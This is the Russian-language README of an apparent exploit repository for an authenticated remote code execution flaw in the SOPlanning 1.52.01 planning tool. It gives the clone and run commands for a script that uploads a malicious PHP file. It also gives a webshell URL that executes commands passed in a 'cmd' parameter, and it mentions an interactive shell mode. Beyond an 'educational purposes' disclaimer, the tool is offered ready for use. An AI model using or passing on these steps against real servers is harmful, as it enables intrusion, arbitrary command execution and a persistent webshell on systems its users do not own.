
Эксплойт для SOPlanning 1.52.01 (Simple Online Planning Tool) — удалённое выполнение кода (RCE) (с аутентификацией)
Этот репозиторий содержит эксплойт для уязвимости удалённого выполнения кода (RCE) в SOPlanning версии 1.52.01. Эксплойт позволяет аутентифицированным пользователям загружать вредоносный PHP-файл и выполнять произвольные команды на сервере.
requests (установка: pip install requests)Клонируйте этот репозиторий:
git clone https://github.com/TheExploiters/SOPlanning-RCE-1.52.01.git
cd SOPlanning-RCE-1.52.01
Запустите скрипт эксплойта:
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
Замените http://example.com:9090 на URL целевого сервера, admin — на имя пользователя, а admin — на пароль.
После успешного выполнения получите доступ к веб-оболочке:
Access webshell here: http://example.com/upload/files/{link_id}/{php_filename}?cmd=<command>
Чтобы использовать интерактивную оболочку, ответьте yes на соответствующий запрос.
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
Этот эксплойт создан Ardayfio Samuel Nii Aryee и предоставляется исключительно в образовательных целях. Автор и владелец репозитория не несут ответственности за любое неправомерное использование или причинённый ущерб. Убедитесь, что у вас есть явное разрешение перед тестированием этого эксплойта на любой системе.